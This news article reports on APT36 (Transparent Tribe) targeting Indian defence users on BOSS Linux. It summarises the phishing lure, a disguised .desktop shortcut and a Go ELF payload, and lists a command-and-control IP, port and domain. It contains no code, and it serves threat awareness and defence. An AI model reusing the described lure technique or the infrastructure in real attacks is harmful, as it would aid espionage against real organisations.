A sophisticated cyber espionage operation, attributed to the group known as APT36 (also referred to as Transparent Tribe), is actively targeting Indian defence personnel and organizations. According to a report by cybersecurity firm Cyfirma, the Pakistan-based group has escalated its tactics by deploying malicious software specifically designed for Linux environments, particularly targeting systems running BOSS Linux, an Indian Linux distribution widely used by government agencies in India.
The new attacks were first identified on June 7, 2025, as researchers revealed that the group employs deceptive phishing emails to lure victims. These emails typically contain a compressed file named “Cyber-Security-Advisory.zip,” which holds a dangerous ‘.desktop’ file. This file acts as a shortcut within Linux systems, posing as a legitimate file to entrap users.
Upon execution, the shortcut manipulates user attention by displaying a seemingly normal PowerPoint presentation, which is designed to distract while a malicious program named `BOSS.elf` is secretly downloaded and executed. This ELF binary, created in the Go programming language, serves as the primary payload responsible for compromising the victim’s system and facilitating unauthorized access to sensitive information.
Furthermore, the malware attempts to establish a connection to a control server at the IP address 101.99.92.182 on port 12520. Security researchers have flagged the domain sorlastore.com as part of the malicious infrastructure used by APT36, particularly in attacks against the Indian defence sector. The increasing sophistication of APT36’s capabilities underscores the need for enhanced cybersecurity measures against evolving threats.
Hackread.com has been closely monitoring the activities of the Transparent Tribe since its inception. The group first gained notoriety with Operation C-Major in March 2016, which utilized spear-phishing and exploited an Adobe Reader vulnerability to distribute spyware within Indian military circles. Recently, they have expanded their target base, demonstrating their adaptability by deploying Android spyware CapraRAT disguised as popular mobile applications.
Experts emphasize that organizations, particularly those in the public sector utilizing Linux systems, must take these threats seriously and adopt robust cybersecurity measures. Jason Soroko, a Senior Fellow at Sectigo, underscores the necessity for preventive measures, including disabling the auto-execution of shortcuts and employing application-allow lists. With the evolving landscape of cyber threats, maintaining proactive defensive strategies remains essential for the protection of sensitive networks.